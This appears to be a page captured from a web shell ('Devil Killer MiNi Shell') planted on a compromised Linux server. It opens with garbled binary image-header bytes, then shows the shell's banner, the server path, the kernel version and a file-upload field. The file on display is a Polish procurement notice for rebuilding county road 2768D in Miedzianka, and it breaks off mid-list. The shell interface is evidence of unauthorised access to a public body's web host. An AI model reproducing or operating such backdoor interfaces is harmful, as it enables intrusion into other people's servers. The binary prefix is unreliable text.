JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220617/0021255801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 2768D w km 0+000 do 0+834 <br/>w Miedziance </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Karkonoski - Starostwo Powiatowe w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821492</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kochanowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 64 73 102</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@powiatkarkonoski.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.powiatkarkonoski.eu/5918</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 2768D w km 0+000 do 0+834 <br/>w Miedziance </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-88f3bb00-ee0e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00212558</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028811/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Przebudowa drogi powiatowej nr 2768D w km 0+000 do 0+834 w Miedziance</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.powiatkarkonoski.eu/7721/dokument/18730 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, tj. miniPortalu<br/>(dostępnego pod adresem: https://miniportal.uzp.gov.pl/), ePUAPu (dostępnego pod adresem: https://epuap.gov.pl/wps/portal lub<br/>https://obywatel.gov.pl/nforms/ezamowienia), a także poczty elektronicznej (adres poczty e-mail: bzp@powiatkarkonoski.eu), przy<br/>czym poczta elektroniczna nie jest właściwa dla składania ofert oraz dokumentów i oświadczeń stanowiących załączniki do oferty.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1W postępowaniu o udzielenie zam. kom. między Zam. a Wyk.odbywa się przy użyciu śr. kom. elekt.j, tj. miniPortalu (https://miniportal.uzp.gov.pl/) ePUAPu(https://epuap.gov.pl/wps/portal lub https://obywatel.gov.pl/nforms/ezamowienia)(adres poczty email:bzp@powiatkarkonoski.eu) 2.Kom. ustna dopuszczalna jest w toku negocjacji oraz w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zam. lub dok. zamówienia oraz ofert.3Wyk. zamierzający wziąć udział w postępowaniu oudzieleniezam.publ.,musiposiadaćkontonaePUAP.Wyk.posiadającykontonaePUAPmadostępdoformularzy: „Formularz do złożenia ,zmiany, wycofania ofertylubwniosku” oraz „Formularzdokomunikacji”.4Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektr., elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal(https://miniportal.uzp.gov.pl/WarunkiUslugi)oraz Warunkach korzystania z elektronicznej platformy usług administracji publ.j(ePUAP https://www.gov.pl/web/gov/warunki-korzystania).Wyk., przystępując do niniejszego postęp. o udzielenie zam. publ.akceptuje warunki korzystania z miniPortalu,określone w w/wRegulaminie oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.5Max rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:Formularzado złożenia,zmiany,wycofania oferty lub wniosku,Formularza do kom.to 150 MB.W przypadku kom.z Zam.za pośrednictwememail,wielkość plików przesyłanych jednorazowo wynosimax20 MB(bez względu na ilość zał.) <br/>6Zasady kom.się Zam z Wyk(nie dotyczy składania ofert i zał.do oferty)1we wszelkiej korespondencji związanej z niniejszym postępowaniem Zam.i Wyk.posługują się numerem ogłoszeniaBZPlubIDpostępowania z miniPortalu.Zam.podajeIDpostępowania na mini portalu jakoZał.Nr15do SWZ.Dane post. można wyszukać również naLiściewszystkichpostępowań w miniPortalu,klikając opcjęDla Wykonawców lub ze strony głównej „Postępowania”2)w post. kom.pomiędzyZam.aWyk.w szczególności składanie dok. i ośw.(innych niż oferta Wyk.oraz zał.do oferty w tym ośw.,o którym mowa w art125 ust1 ustawy Pzp),zawiadomień oraz przekazywanie informacji odbywa się elektr. formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal(Formularz do komunikacji)Zam. dopuszcza również kom. się z Wyk. (w tym składania dokumentów innych niż oferta oraz załączniki do oferty w tym oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp) za pomocą poczty elektr.(bzp@powiatkarkonoski.eu)3Dok. elektr. składane są przez Wyk. za pośrednictwem „Formularza do komunikacji” jako zał. i nie mogą być szyfrowane. Zamawiający dopuszcza również możliwość składania dok. elektr. za pomocą poczty, na adres email pkt 2;4)Sposób sporządzenia dokumentów elektr. musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektr. oraz środków kom.elektr.j w postępowaniu o udzielenie zam. publ.o lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).7.Adres skrzynki podawczej Zam.(Elektroniczna Skrzynka Podawcza – Starostwo Powiatowe w Jeleniej Górze):/7s2scta34v/SkrytkaESP.8.Zam. nie przewiduje sposobu kom. się z Wyk. w inny sposób, niż przy użyciu środków kom.i elektr.j, wskazanych w niniejszym dziale SWZ z zastrzeżeniem sposobu prowadzenia negocjacji w celu ulepszenia treści ofert, zgodnie z art. 289 ust. 5 ustawy Pzp.<br/>9.Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podm. śr.w dow. oraz innych informacji, oświadczeń lub dok. przekazywanych w post., przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym mowa w art. 13 ust. 1 i 3 RODO<br/>w dokumentach zamówienia (Specyfikacja Warunków Zamówienia – Dział XXXIX)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym mowa w art. 19 ust. 4 ustawy<br/>Pzp w dokumentach zamówienia (Specyfikacja Warunków Zamówienia – Dział XXXIX)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.272.1.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 13812342,48 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 609125,40 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa drogi powiatowej nr 2768D <br/>w miejscowości Miedzianka (gmina Janowice Wielkie) w km od 0+000 do 0+834.<br/>2.	Zakres robót do wykonania w ramach przebudowy drogi powiatowej, o której mowa w ust. 1 niniejszego działu:<br/>1)	ścinka poboczy wraz z wbudowaniem ziemi za poboczami w celu utworzenia skarpy;<br/>2)	wycinka krzaków i posuszu na drzewach;<br/>3)	odtworzenie rowów przydrożnych na w/w odcinku drogi;<br/>4)	wymiana istniejących przepustów na nowe z rur PEHD o średnicy 600 mm, <br/>400 mm;<br/>5)	wymiana ścianek przepustów na ścianki z kamienia granitowego na zaprawie cementowej na ławie betonowej;<br/>6)	wykonanie poszerzenia wzmacniającego krawędź jezdni obustronne na głębokość 30 cm;<br/>7)	korytowanie wraz profilowaniem istniejącej podbudowy w celu wykształtowania spadku poprzecznego E2&gt;50 MPa;<br/>8)	wzmocnienie podbudowy kruszywem łamanym 0/31,5 na grubość średnio 15 cm dla osiągnięcia nośności E2&gt;110 MPa;<br/>9)	warstwa wiążąca z betonu asfaltowego AC 16 W KR1-2 o grubości 6 cm;<br/>10)	warstwa ścieralna z betonu asfaltowego AC 11 S KR 1-2 o grubości 5 cm;<br/>11)	pobocza utwardzone kruszywem łamanych o uziarnieniu ciągłym 0/31,5; zamiałowanie odpadem kamiennym wraz z uporządkowaniem terenu za poboczami;<br/>12)	ustawienie oznakowania pionowego.<br/>3.	Szczegółowy opis przedmiotu zamówienia zawierają załączniki do Specyfikacji Warunków Zamówienia (SWZ): <br/>1)	Opis przedmiotu zamówienia – stanowiący Załącznik Nr 5 do SWZ;<br/>2)	Specyfikacje Techniczne Wykonania i Odbioru Robót – stanowiące Załącznik <br/>Nr 6 do SWZ;<br/>3)	Przedmiar robót – stanowiący Załącznik Nr 7 do SWZ;<br/>4)	Dokumentacja techniczna - stanowiąca Załącznik Nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium I – CENA – 60 pkt;<br/>2)	Kryterium II – TERMIN REALIZACJI ZAMÓWIENIA – 20 pkt;<br/>3)	Kryterium III –OKRES GWARANCJI – 20 pkt.<br/>Opis sposobu oceny ofert został wskazany w Dziale XXVI Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN REALIZACJI ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że:<br/>d.1)w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, wykonał w sposób należyty co najmniej jedno zamówienie, obejmujące swoim zakresem budowę, przebudowę lub remont drogi o długości co najmniej 500 m;<br/>d.2) dysponuje co najmniej jedną osobą, która będzie pełnić funkcję Kierownika budowy przy realizacji przedmiotowego zamówienia, uprawnioną do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej <br/>w co najmniej ograniczonym zakresie lub konstrukcyjno-budowlanej bez ograniczeń, wydane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021r., poz. 2351) lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.<br/>W zakresie uprawnień budowlanych Zamawiający dopuszcza kwalifikacje zawodowe nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państwach członkowskich Europejskiego Porozumienia o Wolnych Handlu (EFTA) – stronach umowy o Europejskim Obszarze Gospodarczym – na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r.poz. 2351) <br/>– z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2021 r.poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego wymagane będą<br/>następujące podmiotowe środki dowodowe: 1) oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w<br/>art. 108 ust. 1 pkt 3-6 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz art. 7 ust. 1 ustawy o przeciwdziałaniu wspieraniu agresji na Ukrainę<br/>(wzór oświadczenia stanowi Załącznik Nr 11 do SWZ) - oświadczenie to składa odpowiednio: Wykonawca, każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia oraz podmiot udostepniający zasoby na zasadach określonych w art. 118<br/>ustawy;<br/>2) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi<br/>Załącznik Nr 12 do SWZ);<br/>3)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji. 2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w ust. 1 pkt 2, składa dokument lub dokumenty wystawione w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/>nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury – wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. 3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy. Dokument taki powinien być wystawiony nie wcześniej niż 3 miesiące przed jego<br/>złożeniem. 4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wraz z ofertą składaną w odpowiedzi na ogłoszenie o zamówieniu, należy złożyć następujące oświadczenia i dokumenty:<br/>1)	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (wzór stanowi Załącznik Nr 2 do SWZ);<br/>2)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia – oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynikać będzie, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy (wzór stanowi Załącznik Nr 13 do SWZ),<br/>3)	w przypadku, gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby – zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (wzór stanowi Załącznik Nr 3 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca (realizując zamówienie) będzie dysponował niezbędnymi zasobami podmiotów udostępniających zasoby;<br/>4)	w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie <br/>do reprezentowania Wykonawcy albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia 